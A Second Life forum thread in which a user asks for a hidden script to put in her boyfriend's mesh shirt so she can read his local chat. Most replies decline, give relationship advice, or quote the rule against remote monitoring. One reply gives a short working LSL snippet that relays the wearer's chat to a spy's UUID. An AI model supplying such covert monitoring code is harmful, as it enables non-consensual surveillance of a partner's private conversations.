A spy script that can be put on mesh clothes

lBeryll

You are about to reply to a thread that has been inactive for 1022 days.

Please take a moment to consider if this thread is worth bumping.

Hello, I would like to ask for your help in an urgent matter.  I have a rl boyfriend he also plays SL and i noticed he added some girls.  I suspect he's cheating on me because he's being nice to me at the moment (normally unorthodox behaviors)   I need a spy script but i should put this script in his mesh shirt i made. So when he talks in local ,  i can see these in my avatar.  I know it's unethical but I can't prove it in any way.  It's the only way for me to prove it and turn away from him.   I can't enter your avatar without permission from him, but it is very simple that I can login with the excuse of trying on clothes. I will not use this script later I will even delete. just for prove it.  😥

• Haha 3
  • Confused 1

6 minutes ago, lBeryll said:

he's being nice to me at the moment (normally unorthodox behaviors)

And you still want to hang around long enough to try proving that he is cheating?  Do you really think so little of yourself that you'd continue to put up with his 'normal' behavior?

Geez, just walk away now.

• Like 6
  • Haha 1

Yes you are right but he is someone I have been with for 5 years and it may be something done as revenge for some of my wrongs in the past. I could be wrong i really dont know. 🤦‍♀️ I actually want to prove it to myself, not to him, so i can walk away easily. Because I love him and I think this way would be easier to leave. thank you for your answers. 

Edited by lBeryll
  • Sad 2

If you want to write this script, you came to the right place for help, just show your current script, tell us what's wrong, and we'll help you fix whatever isn't working.

If you want somebody to write a script for you or find one to purchase, you came to the wrong place. Try the help wanted or stuff wanted forums instead.

If you're really seeking drama, there are many role-play communities in-world in deep abiding need of feigned misery, so  don't waste your talent on a mere forums thread.

• Like 6
  • Thanks 1
  • Confused 1

38 minutes ago, lBeryll said:

Yes you are right but he is someone I have been with for 5 years and it may be something done as revenge for some of my wrongs in the past. I could be wrong i really dont know. 🤦‍♀️ I actually want to prove it to myself, not to him, so i can walk away easily. Because I love him and I think this way would be easier to leave. thank you for your answers. 

Seeking justification and confrontation leads to reconciliation, bargaining and denial, the cycle begins again but nothing changes.

This is not a healthy relationship.

https://www.soulshepherding.org/breaking-free-cycle-abuse/

• Like 5
  • Sad 1

41 minutes ago, lBeryll said:

It doesn't really matter how long you have been together.  If "being nice" to you is not normal behavior, then you should ditch him.  I know nothing about you, but you are still worth more than apparently whatever he thinks of you. 

And no matter what you may have done in the past, cheating on someone for revenge is incredibly childish behavior.  If you think that anything you might have done would justify such behavior, then you could use a bit of therapy yourself.

• Like 3
  • Haha 1

1 hour ago, lBeryll said:

Hello, I would like to ask for your help in an urgent matter.  I have a rl boyfriend he also plays SL and i noticed he added some girls.  I suspect he's cheating on me because he's being nice to me at the moment (normally unorthodox behaviors)   I need a spy script but i should put this script in his mesh shirt i made. So when he talks in local ,  i can see these in my avatar.  I know it's unethical but I can't prove it in any way.  It's the only way for me to prove it and turn away from him.   I can't enter your avatar without permission from him, but it is very simple that I can login with the excuse of trying on clothes. I will not use this script later I will even delete. just for prove it.  😥

Let's break this down:
1 - You don't trust your guy. This means your relationship is already broken beyond repair because you can never go back to fully trusting him if you ever did so at all. There will always be doubt, even if he turns out to be innocent (... "this time", right?).
2 - You want to do something which - assuming he still trusts you - will destroy his trust in you if he were ever find to out that you spied on him, or intended to.

Any relationship NOT built on trust is either non-existent, or just a business deal.

So just break up with him now, after coming clean about your suspicions about him and save yourself the lengthy, painful process of growing further and further apart, feeling suspicious of him, causing mutual resentment and hate.

• Like 6
  • Confused 1

2 hours ago, lBeryll said:

Hello, I would like to ask for your help in an urgent matter.  I have a rl boyfriend he also plays SL and i noticed he added some girls.  

state_entry()  
    { 
        llSetTimerEvent(0.55); // every 2 seconds or less
        llSetText("Is he cheating me ? \nYES !", <1,1,1>, 1.0); 
    } 

timer()  
    { 
        vector newcolor = <llFrand(0.9)+.1,llFrand(0.7)+.3,1>; 
        llSetText("Is he cheating me ? \nYES !",  newcolor, 1.0); 
    } 
}

your welcome x

Edited by rasterscan
  • Haha 4
  • Confused 1

Well, what everyone else said, but because I'm slightly evil:

key spy = "<your UUID>";
{
  state_entry()
  {
    llListen(0,"",llGetOwner(),"");
  }
  changed(integer c)
  {	if(c&CHANGED_OWNER) llResetScript();
  }
  listen(integer c, string n, key k, string text)
  {
    llInstantMessage(spy,text);
  }
}

• Like 1
  • Haha 3

1 hour ago, lBeryll said:

Thank you for relationship advices and scripts. I was just looking for script, not drama, I'm already getting treatment for it but sometimes I can't help myself. Apologies if it's been so annoying. 

First this is totally against the TOS and you could get banned for even posting about such a thing. 

Let me make it easy for you. Yes, he's cheating on you. No script needed.

If he's not then since you used your real SL name he can easily find this thread and read all about it. 

Third, your in world profile has no mention of any boyfriend at all. Only you in a skimpy bathing suit.

• Like 3

16 hours ago, lBeryll said:

Remote Monitoring

Remotely monitoring inworld conversations (text or voice chat) without the knowledge or consent of all parties involved is a violation of the Terms of Service. If you feel recording a conversation is necessary, post a clearly-visible sign in the recording location so that all Residents who enter can see it.

KBnote.png Note: If you record a conversation, and someone complains, then the abuse team will determine if you provided sufficient notice to the Residents recorded. Proceed with caution, provide documentation on your efforts to inform all parties they are being monitored, and find a secure area before recording begins.

http://wiki.secondlife.com/wiki/Linden_Lab_Official:Residents'_privacy_rights#Remote_Monitoring

• Like 1
  • Thanks 13

You are about to reply to a thread that has been inactive for 1022 days.

Please take a moment to consider if this thread is worth bumping.